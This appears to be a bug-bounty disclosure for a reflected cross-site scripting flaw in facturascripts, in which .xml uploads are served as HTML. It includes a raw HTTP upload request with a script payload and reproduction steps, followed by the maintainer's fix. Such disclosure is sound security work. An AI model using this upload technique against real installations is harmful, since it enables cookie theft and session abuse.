Cross-site scripting - Reflected via upload `.xml` file in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022


Description

When user upload a file with .xml extension and direct access this file, the server response with Content-type: text/html lead to processing XML as HTML file.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xml"
Content-Type: text/xml

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

  1. Prepare a file xss.xml with content:
<script>alert(window.origin)</script>
  1. Upload xss.xml file in Admin -> Library

image

  1. Click download and XSS

image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 2 years ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back 2 years ago
Carlos Garcia validated this vulnerability 2 years ago
nhienit2010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia
2 years ago

Maintainer


Fixed here https://github.com/NeoRazorX/facturascripts/commit/31a6b6029cd95b2d64baac3d9209cc15e1f928e8

Carlos Garcia marked this as fixed in 2022.07 with commit 31a6b6 2 years ago
Carlos Garcia has been awarded the fix bounty
to join this conversation